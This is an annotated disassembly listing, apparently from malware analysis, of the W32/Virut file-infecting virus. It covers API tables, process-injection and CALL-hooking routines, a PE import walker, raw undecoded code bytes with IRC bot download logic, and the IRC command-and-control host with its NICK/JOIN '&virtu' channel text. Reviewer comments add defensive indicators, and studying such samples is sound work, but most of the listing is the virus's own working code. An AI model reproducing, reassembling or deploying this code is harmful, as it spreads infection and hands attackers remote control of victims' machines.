aBasenamedobjec db '\BaseNamedObjects\W32_Virtu',0
aLstrlen db 'lstrlen',0
aCreatefilea db 'CreateFileA',0
aCreatefilemapp db 'CreateFileMappingA',0
aCreateprocessa db 'CreateProcessA',0
aCreateremote_0 db 'CreateRemoteThread',0
aCreatethread db 'CreateThread',0
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0
aExitthread db 'ExitThread',0
aFiletimetosyst db 'FileTimeToSystemTime',0
aGetfileattribu db 'GetFileAttributesA',0
aGetfilesize db 'GetFileSize',0
aGetfiletime db 'GetFileTime',0
aGetmodulehandl db 'GetModuleHandleA',0
aGettempfilenam db 'GetTempFileNameA',0
aGettemppatha db 'GetTempPathA',0
aGetversion db 'GetVersion',0
aGetversionexa db 'GetVersionExA',0
aLoadlibrarya db 'LoadLibraryA',0
aMapviewoffile db 'MapViewOfFile',0
aOpenfilemappin db 'OpenFileMappingA',0
aOpenprocess db 'OpenProcess',0
aProcess32first db 'Process32First',0
aProcess32next db 'Process32Next',0
aSetfileattribu db 'SetFileAttributesA',0
aSetfiletime db 'SetFileTime',0
aSleep db 'Sleep',0
aSystemtimetofi db 'SystemTimeToFileTime',0
aUnmapviewoffil db 'UnmapViewOfFile',0
aVirtualalloc db 'VirtualAlloc',0
aWritefile db 'WriteFile',0
; Native-API group (11 names), resolved into the table at [ebp+4035D0h].
aNtadjustprivil db 'NtAdjustPrivilegesToken',0
aNtcreatefile db 'NtCreateFile',0
aNtcreateproces db 'NtCreateProcess',0
aNtcreateproc_0 db 'NtCreateProcessEx',0
aNtcreatesectio db 'NtCreateSection',0
aNtmapviewofsec db 'NtMapViewOfSection',0
aNtopenfile db 'NtOpenFile',0
aNtopenprocesst db 'NtOpenProcessToken',0
aNtprotectvirtu db 'NtProtectVirtualMemory',0
aNtwritevirtual db 'NtWriteVirtualMemory',0
aRtlunicodestri db 'RtlUnicodeStringToAnsiString',0
; Socket, WinINet and registry groups; where they are resolved is not in the
; disassembled part of this excerpt.
aWsastartup db 'WSAStartup',0
aClosesocket db 'closesocket',0
aConnect db 'connect',0
aGethostbyname db 'gethostbyname',0
aRecv db 'recv',0
aSend db 'send',0
aSocket db 'socket',0
aInternetcloseh db 'InternetCloseHandle',0
aInternetgetcon db 'InternetGetConnectedState',0
aInternetopena db 'InternetOpenA',0
aInternetopenur db 'InternetOpenUrlA',0
aInternetreadfi db 'InternetReadFile',0
aAdvapi32_dll db 'ADVAPI32.DLL',0
aRegclosekey db 'RegCloseKey',0
aRegopenkeyexa db 'RegOpenKeyExA',0
aRegqueryvaluee db 'RegQueryValueExA',0
aRegsetvalueexa db 'RegSetValueExA',0

; =============== S U B R O U T I N E =======================================
; sub_314335DC - write a 5-byte `E8 rel32` (near CALL) over the first bytes
; of a routine in another process.
; In:  eax = address to overwrite, ecx = CALL destination,
;      ebx = handle passed as the process argument.
; It computes rel32 = ecx - 5 - eax, builds the 5 bytes on the stack, calls
; [ebp+4035F0h] (by table order presumably 'NtProtectVirtualMemory', new
; protection 40h) and then [ebp+4035F4h] (presumably 'NtWriteVirtualMemory',
; length 5). Return values of both calls are ignored.
; Defensive note: the visible result is an E8 byte at the entry of the target
; routine; comparing the first bytes of the routines named in sub_31433613
; against the on-disk image exposes it.
sub_314335DC proc near ; CODE XREF: sub_31433613+70p
; sub_31433613+81p ...
var_5 = byte ptr -5
    sub ecx, 5
    sub ecx, eax                        ; rel32 for a CALL placed at eax
    push ecx
    push 0E8000000h                     ; top byte E8h sits directly below rel32 in memory
    lea ecx, [esp+8+var_5]              ; ecx -> the 5 bytes E8, rel32
    push 0                              ; argument block for the second call: 0, 5, buffer, address, handle
    push 5
    push ecx
    push eax
    push ebx
    push 5                              ; size variable for the first call
    mov ecx, esp
    push eax                            ; address variable for the first call
    mov edx, esp
    push eax                            ; slot that receives the previous protection
    push esp
    push 40h
    push ecx
    push edx
    push ebx
    call dword ptr [ebp+4035F0h]
    add esp, 0Ch                        ; drop the three local variables
    call dword ptr [ebp+4035F4h]        ; uses the five arguments pushed earlier
    add esp, 8                          ; drop the E8/rel32 scratch
    retn
sub_314335DC endp

; =============== S U B R O U T I N E =======================================
; sub_31433613 - map the shared section into the process whose handle is in
; ebx and redirect up to four routines into the mapped copy.
; In:  ebx = handle passed as the process argument.
; Out: eax = mapped base in that process, or 0 if the section could not be
;      opened or mapped (edi is zeroed first and returned at loc_314336BF).
; Steps: open the section by the name at [ebp+4015B1h] (by offset arithmetic
; the 'W32_Virtu' tail of the section-name string) via [ebp+4035A4h]
; (presumably 'OpenFileMappingA'); map 69CEh bytes via [ebp+4035E4h]; release
; the local handle via [ebp+40353Ch]; optionally call a body routine at
; offset [ebp+401588h]; then call sub_314335DC for the routines in slots
; 4035D4h, 4035E8h, 4035D8h and (if present) 4035DCh, with destinations at
; mapped base + 2394h / 23E1h / 23E8h / 23F5h.
sub_31433613 proc near ; CODE XREF: UPX2:314350D5p
    push edi
    lea eax, [ebp+4015B1h]
    xor edi, edi                        ; default return value 0
    push eax
    push 0
    push 0Eh
    call dword ptr [ebp+4035A4h]
    test eax, eax
    jz loc_314336BF
    push eax                            ; kept on the stack for the release call below
    push 69CEh
    mov edx, esp
    push 0
    mov ecx, esp
    push 40h
    push 100000h
    push 2
    push edx
    push 0
    push 69CEh
    push 0
    push ecx
    push ebx
    push eax
    call dword ptr [ebp+4035E4h]
    pop edi                             ; edi = base written by the call (0 if nothing was mapped)
    pop ecx
    call dword ptr [ebp+40353Ch]        ; release the section handle pushed above
    test edi, edi
    jz short loc_314336BF
    mov ecx, [ebp+401588h]
    jecxz short loc_31433677            ; no optional routine configured
    lea edx, [ebp+401000h]
    add edx, ecx
    push edi
    push ebx
    call edx

loc_31433677: ; CODE XREF: sub_31433613+56j
    mov eax, [ebp+4035D4h]
    lea ecx, [edi+2394h]
    call sub_314335DC
    mov eax, [ebp+4035E8h]
    lea ecx, [edi+23E1h]
    call sub_314335DC
    mov eax, [ebp+4035D8h]
    lea ecx, [edi+23E8h]
    call sub_314335DC
    mov eax, [ebp+4035DCh]
    test eax, eax
    jz short loc_314336BF               ; fourth routine is optional
    lea ecx, [edi+23F5h]
    call sub_314335DC

loc_314336BF: ; CODE XREF: sub_31433613+16j
; sub_31433613+4Ej ...
    mov eax, edi                        ; tail of sub_31433613: return the mapped base (0 on failure)
    pop edi
    retn
sub_31433613 endp

; ---------------------------------------------------------------------------
; Unlabelled stub. It derives its own base (`call $+5 / pop ebp / sub ebp`),
; calls [ebp+40356Ch] with the routine at [ebp+401DAEh] as the start argument
; (slot 5; by table order presumably 'CreateThread'), then passes the returned
; handle to [ebp+40353Ch] and returns with `retn 4`.
    push ebp
    call $+5
    pop ebp
    sub ebp, 401A14h
    xor ecx, ecx
    lea eax, [ebp+401DAEh]
    push ecx                            ; scratch dword that receives the id
    push esp
    push ecx
    push ecx
    push eax                            ; start address
    push ecx
    push ecx
    call dword ptr [ebp+40356Ch]
    xchg eax, [esp]                     ; replace the scratch dword with the returned handle
    call dword ptr [ebp+40353Ch]
    pop ebp
    retn 4
; ---------------------------------------------------------------------------
; Undisassembled bytes. `dw 0E855h` followed by zero padding and 5Dh/81h/EDh
; matches the same push ebp / call $+5 / pop ebp / sub ebp prologue, so this
; is code IDA did not decode. NOTE(review): define code here before analysis.
    dw 0E855h
    align 8
    dd 43ED815Dh, 6A00401Ah, 0E958DFFh, 5000401Ah, 2420CD52h
    dd 83002A00h, 0C7660CC4h, 401A5485h, 0C720CD00h, 401A5685h
    dd 2A002400h, 6AC35D00h, 0FF016A01h, 473FF33h, 0C08515FFh
    dd 0B68F074h, 8B000000h, 50035BD0h, 72B58D3Ch, 8B00401Ah
    dd 10CBAh, 88A8B00h, 3000001h, 60CB2BF8h, 0A6F3CB8Bh, 47057461h
    dd 0C2EBF5E2h, 570FC783h, 8B53D48Bh, 6A5450CCh, 6A525140h
    dd 0F095FFFFh, 83004035h, 958B0CC4h, 403574h, 0EA83D72Bh
    dd 6A07C707h, 8900E800h, 6AC30357h, 9E8581Ah, 8D000000h
    dd 0FEAA6142h, 0C3F075C9h

; =============== S U B R O U T I N E =======================================
; sub_314337A4 - pseudo-random number helper (linear congruential step).
; In:  eax = range.
; State: dword at [ebp+403646h]; updated as state = state * 8088405h + 1.
; Out: edx = high 32 bits of (eax * state), eax = low 32 bits. For a nonzero
;      range the value in edx is below that range. Clobbers flags.
; Callers in this listing read the result from edx/dl.
sub_314337A4 proc near ; CODE XREF: sub_3143400F+1Bp
; sub_31434187+3p ...
    imul edx, [ebp+403646h], 8088405h
    inc edx
    mov [ebp+403646h], edx
    mul edx                             ; edx:eax = eax * state
    retn
sub_314337A4 endp

; ---------------------------------------------------------------------------
; Undisassembled bytes (starts with the same 55 E8 00 00 00 00 5D 81 ED
; prologue pattern). The dwords contain readable ASCII fragments, e.g.
; 474E4950h = 'PING', 74656721h = '!get', 6E776F44h/64616F6Ch = 'Down'/'load'.
; NOTE(review): these suggest text-protocol handling, but the logic itself is
; not visible until this run is disassembled - do not infer behaviour from
; the fragments alone.
    dd 0E855h, 815D0000h, 401B09EDh, 4A9D8B00h, 83004036h
    dd 8247Ch, 0B9840Fh, 0EC810000h, 208h, 1046854h, 95FF0000h
    dd 403590h, 848DFC8Bh, 10424h, 6A5000h, 4E8h, 54525600h
    dd 95FF5700h, 40358Ch, 978DC933h, 104h, 26A5151h, 68016A51h
    dd 40000000h, 5C95FF52h, 96004035h, 5B74F685h, 4685450h
    dd 57000001h, 2024B4FFh, 0FF000002h, 40362895h, 0C0855900h
    dd 14E31674h, 6AD48B50h, 57515200h, 0CC95FF56h, 59004035h
    dd 0D075C085h, 3C95FF56h, 8D004035h, 57524457h, 8D58446Ah
    dd 10497h, 0C033AB00h, 0F359106Ah, 505050ABh, 50505050h
    dd 6495FF52h, 81004035h, 208C4h, 2474FF00h, 1895FF08h
    dd 53004036h, 361895FFh, 0C25D0040h, 3E800004h, 4601750Ah
    dd 15848D8Bh, 19E30040h, 1000958Dh, 0D1030040h, 84D2FF56h
    dd 1F880FC0h, 0F000001h, 11084h, 3A3E8000h, 80461075h
    dd 840F003Eh, 101h, 75203E80h, 3E8146F1h, 474E4950h, 0CF8B4275h
    dd 4F0146C6h, 6A51CE2Bh, 53565100h, 361095FFh, 3B590040h
    dd 0DF850FC1h, 8D000000h, 401DA285h, 68006A00h, 0Ch, 95FF5350h
    dd 403610h, 0C3Dh, 0BF850F00h, 0E9000000h, 0B1h, 52503E81h
    dd 850F5649h, 0A5h, 0AC08C683h, 840F0D3Ch, 99h, 0F375203Ch
    dd 0F3A3CACh, 8C85h, 200DAD00h, 3D202020h, 74656721h, 3CAC7F75h
    dd 817C7520h, 6820FF7Eh, 71757474h, 70037E81h, 752F2F3Ah
    dd 0FF47C668h, 0BA310F00h, 2710h, 0FF52E2F7h, 4035BC95h
    dd 50C03300h, 0E8505050h, 9, 6E776F44h, 64616F6Ch, 2095FF00h
    dd 85004036h, 333674C0h, 4A8589C9h, 51004036h, 20068h
    dd 56515180h, 2495FF50h, 8D004036h, 401B0395h, 0C9335000h
    dd 52505154h, 95FF5151h, 40356Ch, 0FF240487h, 40353C95h
    dd 80C3F800h, 4015778Dh, 0C3F90100h
; Configuration strings (host and network indicators present on this page).
; How the registry key and value name are used is not shown in the
; disassembled code of this excerpt; the registry API names appear in the
; name table.
aSoftwareMicr_1 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer',0
aTargethost db 'TargetHost',0
; NOTE(review): the next 7 bytes plus the first character of the string below
; (79h, 'y') form 8 bytes shaped like a socket address record: word 2, two
; bytes FFh F0h, four bytes 73h 7Eh 02h 79h. If so, the host name proper
; starts one byte later ('proxim.ircgalaxy.pl') and IDA merged the last
; address byte into the string. Verify in a hex view and treat both spellings
; as candidate indicators until confirmed.
    dw 2
    db 0FFh
    db 0F0h, 73h, 7Eh
    db 2
aYproxim_ircgal db 'yproxim.ircgalaxy.pl',0
; ---------------------------------------------------------------------------
; NOTE(review): from here to the `push ebp` before loc_31433A6A the listed
; instructions are printable ASCII decoded as code (4E 49 43 4B = 'NICK', then
; text containing 'USER', 'JOIN' and '&virtu', each command ending in 0Ah).
; It is protocol text, not an instruction stream; convert it to a string in
; the database.
    dec esi
    dec ecx
    inc ebx
    dec ebx
    and [ebp+69h], ch
    push 6B696F6Ch
    push 4553550Ah
    push edx
    and [ecx+30h], bh
    xor dh, [eax]
    xor eax, 2E203130h
    and [esi], ch
    and [edx], bh
    sub eax, 4E494F4Ah
    and [esi], ah
    jbe short near ptr loc_31433AC7+1
    jb short near ptr loc_31433AD4+1
    jnz short near ptr loc_31433A6A+3
    ; Real code resumes here: a routine entry that computes its own base.
    ; By offset arithmetic this is the start address [ebp+401DAEh] used by
    ; the stub at the top of this block (401DB4h - 6) - confirm.
    push ebp
    call $+5
    pop ebp

loc_31433A6A: ; CODE XREF: UPX2:31433A61j
    sub ebp, 401DB4h
    mov byte ptr [ebp+401577h], 0
    call dword ptr [ebp+403594h]        ; slot 15; by table order presumably 'GetVersion'
    shr eax, 1Fh
    jz short loc_31433ABE               ; top bit clear: use the section-based path
    ; Top bit set: scan 1Eh bytes at the routine [ebp+403550h] for the byte
    ; 2Eh followed by FFh 1Dh, then save the 6 bytes found at the referenced
    ; address to [ebp+403640h] and overwrite them with a pointer to
    ; [ebp+40336Ah] plus the current cs value, with interrupts disabled.
    ; NOTE(review): `cli`/`sti` fault in user mode on NT-family systems, so
    ; this branch is only viable where such instructions are permitted.
    push 1Eh
    mov esi, [ebp+403550h]
    pop ecx

loc_31433A8B: ; CODE XREF: UPX2:loc_31433ABAj
    lodsb
    cmp al, 2Eh
    jnz short loc_31433ABA
    cmp word ptr [esi], 1DFFh
    jnz short loc_31433ABA
    lea edi, [ebp+403640h]
    mov esi, [esi+2]                    ; address operand of the matched instruction
    push edi
    movsd                               ; save the original 6 bytes
    movsw
    lea eax, [ebp+40336Ah]
    pop dword ptr [ebp+403390h]         ; remember where the saved copy lives
    cli
    mov [esi-6], eax                    ; replace the 32-bit offset
    mov word ptr [esi-2], cs            ; replace the 16-bit selector
    sti
    mov cl, 1                           ; force the loop to end after this match

loc_31433ABA: ; CODE XREF: UPX2:31433A8Ej
; UPX2:31433A95j
    loop loc_31433A8B
    jmp short loc_31433B01
; ---------------------------------------------------------------------------

loc_31433ABE: ; CODE XREF: UPX2:31433A80j
    lea eax, [ebp+4015B1h]              ; by offset arithmetic the 'W32_Virtu' tail of the section name
    push eax
    push 0

loc_31433AC7: ; CODE XREF: UPX2:31433A5Dj
    push 0Eh
    call dword ptr [ebp+4035A4h]        ; slot 19; by table order presumably 'OpenFileMappingA'
    cmp dword ptr [esp+8], 4

loc_31433AD4: ; CODE XREF: UPX2:31433A5Fj
    jnz short loc_31433B01
    call near ptr loc_31433ADE+1        ; CALL over inline data
    ; NOTE(review): bytes read as ASCII 'SFC',0.
    push ebx
    inc esi
    inc ebx

loc_31433ADE: ; CODE XREF: UPX2:31433AD6p
    ; Mis-decode (real stream starts at loc_31433ADE+1); the dwords after it
    ; contain the ASCII 'SFC_OS'. Re-disassemble from +1.
    add bh, bh
    xchg eax, ebp
    mov ds:48E80040h, dh
    cld
; ---------------------------------------------------------------------------
    dd 7E8FFFFh, 53000000h, 4F5F4346h, 95FF0053h, 403588h
    dd 0FFFC31E8h
    db 0FFh
; ---------------------------------------------------------------------------

loc_31433B01: ; CODE XREF: UPX2:31433ABCj
; UPX2:loc_31433AD4j
    call sub_31432E5C                   ; create/open the named object again
    dec dword ptr [ebp+401303h]         ; counterpart of the `mov byte ptr [ebp+401303h], 1` in sub_31432DDE's chunk
    call near ptr loc_31433B1B+1        ; CALL over inline data
    ; NOTE(review): bytes read as ASCII 'USER32.DLL',0.
    push ebp
    push ebx
    inc ebp
    push edx
    xor esi, [edx]
    db 2Eh
    inc esp
    dec esp
    dec esp

loc_31433B1B: ; CODE XREF: UPX2:31433B0Cp
    ; Mis-decode (real stream starts at loc_31433B1B+1). The dwords that
    ; follow contain the ASCII 'wsprintfA'.
    add bh, bh
    xchg eax, ebp
    pushf
    xor eax, 0AE80040h
; ---------------------------------------------------------------------------
    dd 77000000h, 69727073h, 4166746Eh, 95FF5000h, 403548h
dd 35548589h, 310F0040h, 18E08D8Dh, 85890040h, 403646h dd 9C95FF51h, 93004035h, 468h, 0EDB58D00h, 59004018h, 362CBD8Dh dd 0D6E80040h, 66FFFFF6h, 1D6785C7h, 0F0FF0040h, 1D69A583h dd 8D000040h, 401D2795h, 6A545000h, 52006A01h, 268h, 3095FF80h dd 85004036h, 22755AC0h, 1D5A8D8Dh, 6A520040h, 67B58D06h dd 5400401Dh, 51505056h, 3495FF52h, 58004036h, 362C95FFh dd 85C60040h, 40384Dh, 0CE800h, 53570000h, 334B434Fh, 4C442E32h dd 95FF004Ch, 40359Ch, 76893h, 0B58D0000h, 401844h, 0FCBD8D59h dd 0E8004035h, 0FFFFF651h, 0CE8h, 4E495700h, 54454E49h dd 4C4C442Eh, 9C95FF00h, 85004035h, 0E7840FC0h, 93000001h dd 568h, 82B58D00h, 59004018h, 3618BD8Dh, 1AE80040h, 83FFFFF6h dd 40361CBDh, 840F0000h, 1C2h, 190EC81h, 68540000h, 101h dd 35FC95FFh, 0C4810040h, 190h, 6AD48B50h, 95FF5200h, 40361Ch dd 7559C085h, 1388680Dh, 95FF0000h, 4035BCh, 0BD83E2EBh dd 401D69h, 8D297500h, 401D6D85h, 95FF5000h, 403608h, 840FC085h dd 13Bh, 8B0C408Bh, 8F30FF00h, 401D6985h, 4D85C600h, 1004038h dd 16A006Ah, 95FF026Ah, 403614h, 0FFFF883h, 11284h, 958D9300h dd 401D65h, 5352106Ah, 360495FFh, 0C0850040h, 0F2850Fh dd 0BD8D0000h, 401D86h, 0BCE808B1h, 68FFFFFAh, 94h, 89E62B5Eh dd 0FF542434h, 40359895h, 94BD8D00h, 0B100401Dh, 0FA9DE801h dd 448BFFFFh, 0E0C11024h, 24440B08h, 8E0C104h, 824440Bh dd 5E850h, 2E250000h, 57007836h, 355495FFh, 0C4830040h dd 647C60Ch, 81958D20h, 6A00401Dh, 216800h, 53520000h dd 361095FFh, 7C8D0040h, 0FF571424h, 40355895h, 3804C600h dd 6A400Ah, 0FF535750h, 40361095h, 8DE60300h, 401DA2BDh dd 68006A00h, 0Ch, 95FF5357h, 403610h, 0C3Dh, 8D4D7500h dd 40364EB5h, 4D8D8D00h, 2B004038h, 51006ACEh, 95FF5356h dd 40360Ch, 7E00F883h, 0FE8B912Fh, 364EB58Dh, 0DB00040h dd 1075AEF2h, 0FAF8E860h, 7261FFFFh, 8D09E317h, 0EAEB0177h dd 0CE2BCF8Bh, 364EBD8Dh, 0A4F30040h, 0B9EBF787h, 95FF53h dd 80004036h, 401577BDh, 2A740100h, 753068h, 0BC95FF00h dd 80004035h, 40384DBDh, 11740000h, 1D6985C7h, 40h, 85C60000h dd 40384Dh, 0FE56E900h, 85C7FFFFh, 401580h, 80000000h dd 4C25Dh, 204F0A0Dh, 6E6F6F6Eh, 20666F20h, 6566696Ch dd 
204F2021h, 656D6974h, 206F7420h, 656C6563h, 74617262h
    ; (The line above continues the operand list of the `dd` that ends the
    ; previous line of the listing.)
    ; The dwords up to 0C784040Ah decode as printable ASCII with CR/LF line
    ; breaks, e.g. '! O time to celebrate!' and 'O summer garden!'. They are
    ; embedded text, usable as a static match string; the dwords after that
    ; are not printable and their meaning is not visible here.
    dd 0A0D2165h, 20202020h, 73204F20h, 656D6D75h, 61672072h
    dd 6E656472h, 520A0D21h, 6E656C65h, 73656C74h, 20796C73h
    dd 70706168h, 6E612079h, 78652064h, 74636570h, 2C746E61h
    dd 61747320h, 6E69646Eh, 2D203A67h, 61570A0Dh, 69686374h
    dd 6120676Eh, 64206C6Ch, 61207961h, 6E20646Eh, 74686769h
    dd 6F66202Ch, 72662072h, 646E6569h, 20492073h, 74696177h
    dd 570A0D3Ah, 65726568h, 65726120h, 756F7920h, 7266202Ch
    dd 646E6569h, 43203F73h, 21656D6Fh, 20744920h, 74207369h
    dd 21656D69h, 27744920h, 616C2073h, 0D216574h, 0C784040Ah
    dd 0A6141330h, 0D479ED10h, 0B7AB44Fh, 0A6142905h, 0B1FAE510h
    dd 401CEA27h, 858B9957h, 9ADB6EDBh, 73C17E1Ch, 99AD471Ah
    dd 37524862h, 0AB595740h, 4522DF3Ah, 0F61F7535h, 6EF96A2Fh
    dd 0AF69DF60h, 6CCC5C53h, 0B8B352C2h, 0D8h, 0Ch dup(0)
    db 0

; =============== S U B R O U T I N E =======================================
; sub_31433F59 - find the table entry whose range contains a given offset.
; In:  [esp+4] = offset to look up (removed by `retn 4`),
;      ebx = header pointer.
; The field offsets used (+6 count, +14h size of the following block, entries
; of 28h bytes starting at ebx+18h+size, with +8 / +0Ch / +14h inside each
; entry) match IMAGE_NT_HEADERS and IMAGE_SECTION_HEADER - assuming ebx points
; at the NT headers of a mapped file; TODO confirm at the callers.
; Out: [ebp+4039A6h] = matching entry (0 if none),
;      [ebp+4039AAh] = entry[+14h] - entry[+0Ch] (0 if none).
;      All registers preserved (pusha/popa).
; Robustness note: with a count of 0 the `loop` wraps ecx and scans far past
; the table; the routine relies on well-formed headers.
sub_31433F59 proc near ; CODE XREF: sub_31433FA0:loc_31433FFDp
; sub_31434060+7p ...
arg_0 = dword ptr 4
    pusha
    and dword ptr [ebp+4039A6h], 0      ; default results: not found
    and dword ptr [ebp+4039AAh], 0
    movzx eax, word ptr [ebx+14h]
    lea edx, [ebx+18h]
    movzx ecx, word ptr [ebx+6]         ; number of entries
    add edx, eax                        ; edx = first entry

loc_31433F75: ; CODE XREF: sub_31433F59+41j
    mov eax, [esp+20h+arg_0]
    sub eax, [edx+0Ch]
    jb short loc_31433F97               ; offset below this entry's start
    cmp eax, [edx+8]
    jnb short loc_31433F97              ; offset at or beyond this entry's length
    mov eax, [edx+14h]
    sub eax, [edx+0Ch]
    mov [ebp+4039A6h], edx
    mov [ebp+4039AAh], eax
    jmp short loc_31433F9C
; ---------------------------------------------------------------------------

loc_31433F97: ; CODE XREF: sub_31433F59+23j
; sub_31433F59+28j
    add edx, 28h
    loop loc_31433F75

loc_31433F9C: ; CODE XREF: sub_31433F59+3Cj
    popa
    retn 4
sub_31433F59 endp

; =============== S U B R O U T I N E =======================================
; sub_31433FA0 - choose one entry via sub_3143400F and return a value derived
; from it in ecx.
; In:  al = value stored at [ebp+4022F7h] (used below as a table length),
;      ebx / esi / edx as expected by sub_31434060.
; Control flow is unconventional: sub_3143400F pops this routine's return
; address and registers it as a per-entry callback, so the code from
; `push 1Fh` onward is entered repeatedly with ebx = a name hash, and its
; `retn` returns into the walker. IDA's "sp-analysis failed" reflects that.
; The callback counts hashes that are NOT in the 1Fh-entry table at
; [ebp+402224h]; on a match it shifts the table and leaves via loc_31433FE1.
; NOTE(review): the stack effect of `pop eax / pop ebx / pop esi` at
; loc_31433FEB depends on the walker's frame - verify in a debugger before
; documenting further.
sub_31433FA0 proc near ; CODE XREF: UPX2:314342CCp
; UPX2:314342F2p
    mov [ebp+4022F7h], al
    call sub_3143400F
    push 1Fh
    lea eax, [ebp+402224h]
    pop ecx

loc_31433FB7: ; CODE XREF: sub_31433FA0+1Ej
    cmp [eax], ebx
    jz short loc_31433FC7
    add eax, 4
    loop loc_31433FB7
    inc dword ptr [ebp+40398Eh]         ; not in the table: count it
    retn
; ---------------------------------------------------------------------------

loc_31433FC7: ; CODE XREF: sub_31433FA0+19j
    neg ecx
    add ecx, [ebp+4022F7h]
    jecxz short loc_31433FE1

loc_31433FD1: ; CODE XREF: sub_31433FA0+39j
    push dword ptr [eax-4]              ; shift earlier entries up by one slot
    pop dword ptr [eax]
    sub eax, 4
    loop loc_31433FD1
    mov [ebp+402224h], ebx              ; matched hash moves to the front

loc_31433FE1: ; CODE XREF: sub_31433FA0+2Fj
; sub_3143400F+34j
    cmp dword ptr [edx], 0
    jz short loc_31433FEB
    sub esi, [edx]
    add esi, [edx+10h]

loc_31433FEB: ; CODE XREF: sub_31433FA0+44j
    lea ecx, [esi-4]
    pop eax
    pop ebx
    pop esi
    cmp dword ptr [edx], 0
    jz short loc_31433FFA
    push dword ptr [edx]
    jmp short loc_31433FFD
; ---------------------------------------------------------------------------

loc_31433FFA: ; CODE XREF: sub_31433FA0+54j
    push dword ptr [edx+10h]

loc_31433FFD: ; CODE XREF: sub_31433FA0+58j
    call sub_31433F59
    sub ecx, esi
    sub ecx, [ebp+4039AAh]
    pop eax
    add ecx, [ebx+34h]                  ; add the dword at header+34h (ImageBase in NT headers, if ebx is as assumed)
    retn
sub_31433FA0 endp ; sp-analysis failed

; =============== S U B R O U T I N E =======================================
; sub_3143400F - two-pass random pick.
; Pass 1: registers its caller's continuation as callback ([ebp+403992h]),
; zeroes the counter [ebp+40398Eh] and runs the walker sub_31434060.
; Then draws a number below the counter (sub_314337A4) and runs a second
; walk through sub_3143404C, where the code after that call acts as the
; callback: it counts down and, at zero, records ebx at [ebp+4022A0h] and
; jumps to loc_31433FE1.
; It never returns with a normal `retn` to its caller (the return address is
; popped), hence "sp-analysis failed".
sub_3143400F proc near ; CODE XREF: sub_31433FA0+6p
    pop dword ptr [ebp+403992h]         ; callback = caller's next instruction
    mov dword ptr [ebp+40398Eh], 0
    call sub_31434060
    mov eax, [ebp+40398Eh]              ; number of counted entries
    call sub_314337A4                   ; edx = random value below that count
    call sub_3143404C
    cmp dword ptr [ebp+40398Eh], 0      ; (entered as callback from the second walk)
    jnz short loc_31434045
    mov [ebp+4022A0h], ebx
    jmp short loc_31433FE1
; ---------------------------------------------------------------------------

loc_31434045: ; CODE XREF: sub_3143400F+2Cj
    dec dword ptr [ebp+40398Eh]
    retn
sub_3143400F endp ; sp-analysis failed

; =============== S U B R O U T I N E =======================================
; sub_3143404C - second-pass driver: registers its caller's continuation as
; callback, stores edx in the counter and runs the walker. If the walk ends
; without the callback leaving through loc_31433FE1, it returns ecx = 0 to
; the address that called the caller.
sub_3143404C proc near ; CODE XREF: sub_3143400F+20p
    pop dword ptr [ebp+403992h]
    mov [ebp+40398Eh], edx
    call sub_31434060
    xor ecx, ecx
    retn
sub_3143404C endp ; sp-analysis failed

; =============== S U B R O U T I N E =======================================
; sub_31434060 - walk a table of 14h-byte descriptors and invoke the callback
; at [ebp+403992h] once per named entry, passing a hash of the name in ebx.
; In:  ebx = header pointer, esi = base of the mapped file data
;      (both as used by sub_31433F59 - TODO confirm at callers).
; The descriptor fields used (+0, +0Ch, +10h) and the start offset read from
; [ebx+80h] match the PE import directory (lookup table, DLL name, address
; table), assuming ebx points at NT headers.
; Filter on the DLL name: only names with at least 6 characters before a
; '.DLL' suffix (compared case-insensitively) and with the two characters
; '32' right before the dot are processed.
; Per entry: values with the top bit set are skipped; otherwise the name at
; (entry + 2) is hashed as h = 15*h - (c | 20h) per character, and the
; callback is skipped for eight fixed hash values.
; NOTE(review): which names those eight constants correspond to cannot be
; determined from this listing.
; Clobbers eax, ecx, edx; ebx is restored around each entry. No bounds checks
; are made on any offset read from the file data.
sub_31434060 proc near ; CODE XREF: sub_3143400F+10p
; sub_3143404C+Cp ...
var_C = dword ptr -0Ch
var_4 = dword ptr -4
    mov edx, [ebx+80h]
    push edx
    call sub_31433F59                   ; sets the offset delta for this table
    add edx, [ebp+4039AAh]
    add edx, esi                        ; edx = first descriptor in the mapped data

loc_31434074: ; CODE XREF: sub_31434060+120j
    cmp dword ptr [edx+0Ch], 0          ; end of table when name or address-table field is 0
    jz locret_31434185
    cmp dword ptr [edx+10h], 0
    jz locret_31434185
    mov eax, [edx+0Ch]
    push eax
    call sub_31433F59
    add eax, [ebp+4039AAh]
    add eax, esi                        ; eax = DLL name string
    push eax                            ; remember its start

loc_3143409A: ; CODE XREF: sub_31434060+47j
    mov cl, [eax]
    cmp cl, 0
    jz short loc_314340BA
    cmp cl, 2Eh                         ; '.'
    jz short loc_314340A9

loc_314340A6: ; CODE XREF: sub_31434060+58j
    inc eax
    jmp short loc_3143409A
; ---------------------------------------------------------------------------

loc_314340A9: ; CODE XREF: sub_31434060+44j
    mov ecx, [eax+1]
    and ecx, 0DFDFDFDFh                 ; fold to upper case
    cmp ecx, 4C4C44h                    ; 'DLL' followed by NUL
    jnz short loc_314340A6

loc_314340BA: ; CODE XREF: sub_31434060+3Fj
    pop ecx
    sub ecx, eax                        ; ecx = -(characters before the dot or NUL)
    cmp ecx, 0FFFFFFFAh
    jg loc_3143417D                     ; fewer than 6 characters: next descriptor
    cmp word ptr [eax-2], 3233h         ; '32'
    jnz loc_3143417D
    push esi
    cmp dword ptr [edx], 0
    jnz short loc_314340DD
    mov ecx, [edx+10h]                  ; fall back to the +10h table when +0 is empty
    jmp short loc_314340DF
; ---------------------------------------------------------------------------

loc_314340DD: ; CODE XREF: sub_31434060+76j
    mov ecx, [edx]

loc_314340DF: ; CODE XREF: sub_31434060+7Bj
    add esi, ecx
    push ecx
    call sub_31433F59
    add esi, [ebp+4039AAh]              ; esi = entry array in the mapped data

loc_314340ED: ; CODE XREF: sub_31434060+90j
; sub_31434060+117j
    lodsd
    test eax, eax
    js short loc_314340ED               ; top bit set: no name, skip
    jz loc_3143417C                     ; 0 terminates the array
    push dword ptr [ebp+4039AAh]        ; preserve the delta across the lookup
    push eax
    call sub_31433F59
    add eax, [ebp+4039AAh]
    pop dword ptr [ebp+4039AAh]
    add eax, [esp+4+var_4]              ; add the saved esi (mapped base)
    push ebx
    add eax, 2                          ; skip the 2-byte prefix before the name
    xor ebx, ebx

loc_31434119: ; CODE XREF: sub_31434060+CEj
    movzx ecx, byte ptr [eax]
    jecxz short loc_31434130
    or cl, 20h
    push ebx
    shl [esp+0Ch+var_C], 4
